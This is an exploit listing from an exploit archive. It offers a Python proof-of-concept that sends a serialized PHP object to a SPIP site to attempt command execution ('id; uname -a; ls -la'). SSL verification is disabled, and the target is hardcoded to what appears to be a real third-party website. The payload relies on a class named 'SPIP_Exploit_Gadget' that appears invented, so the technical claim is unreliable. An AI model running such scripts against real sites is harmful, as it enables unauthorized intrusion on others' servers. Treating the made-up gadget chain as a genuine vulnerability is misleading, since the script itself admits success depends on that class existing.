## https://sploitus.com/exploit?id=PACKETSTORM:216154
=============================================================================================================================================
| # Title : SPIP Gadget Chain before 4.4.9 Potential PHP Object Deserialization Vulnerability |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://www.spip.net/en_rubrique25.html |
=============================================================================================================================================
[+] Summary : This Python script is designed to send a crafted serialized PHP object to a target website in order to test for a potential PHP Object Deserialization vulnerability.
It:
Uses the requests library to send a GET request to a specified target URL.
Generates a serialized PHP payload referencing a class named SPIP_Exploit_Gadget.
Injects the payload into the var_data parameter.
Attempts to trigger command execution (id; uname -a; ls -la) if a vulnerable gadget chain exists on the server.
Disables SSL certificate verification warnings for testing purposes.
Prints the HTTP response and checks if command output appears in the response body.
[+] POC :
import requests
import urllib.parse
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
target_url = "https://www.peyres.fr"
command_to_run = "id; uname -a; ls -la"
def generate_payload(cmd):
"""
Generate a PHP serialized payload.
Note: Success depends on the existence of the 'SPIP_Exploit_Gadget' class
or an equivalent Gadget Chain within the server-side files.
"""
payload = f'O:19:"SPIP_Exploit_Gadget":1:{{s:7:"command";s:{len(cmd)}:"{cmd}";}}'
return payload
def launch_exploit():
payload = generate_payload(command_to_run)
params = {
'page': 'article',
'id_article': '1',
'var_data': payload
}
print(f"[*] Sending payload to: {target_url}")
print(f"[*] Target Command: {command_to_run}")
try:
response = requests.get(target_url, params=params, timeout=15, verify=False)
print("-" * 30)
print(f"[+] Response Status: {response.status_code}")
if response.status_code == 200:
print("[+] Potential output found in response body:")
print(response.text[:1000]) # Print first 1000 characters for inspection
else:
print("[-] Server responded with an error.")
print("-" * 30)
except requests.exceptions.RequestException as e:
print(f"[-] Connection Error: {e}")
if __name__ == "__main__":
launch_exploit()
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================